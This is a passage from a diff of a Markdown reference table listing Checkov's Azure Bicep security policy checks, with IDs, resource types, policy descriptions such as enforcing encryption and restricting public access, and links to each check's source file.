[StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 58 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | 
[MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 59 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 60 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 61 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 62 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 63 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 64 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 65 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed 
request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 66 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 67 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 68 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 69 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 70 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 71 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 72 | CKV_AZURE_96 | 
resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 73 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 74 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 75 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 76 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 77 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 78 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | 
[APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 79 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 80 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 81 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 82 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 83 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 84 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 85 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | 
[FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 86 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 87 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | -| 88 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 89 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 90 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 91 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 92 | CKV_AZURE_151 | 
resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 93 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 94 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 95 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 96 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic 
authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | 
[AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) |
+| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) |
+| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
+| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
+| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
+| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
+| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
+| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
+| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) |
+| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) |
+| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) |
+| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) |
+| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) |
+| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) |
+| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) |
+| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) |
+| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) |
+| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) |
+| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) |
+| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) |
+| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) |
+| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) |
+| 33 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) |
+| 34 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) |
+| 35 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) |
+| 36 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) |
+| 37 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) |
+| 38 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) |
+| 39 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) |
+| 40 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) |
+| 41 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) |
+| 42 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) |
+| 43 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) |
+| 44 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) |
+| 45 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) |
+| 46 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 47 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 48 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 49 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) |
+| 50 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) |
+| 51 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) |
+| 52 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) |
+| 53 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) |
+| 54 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) |
+| 55 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) |
+| 56 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) |
+| 57 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) |
+| 58 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) |
+| 59 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) |
+| 60 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) |
+| 61 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) |
+| 62 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) |
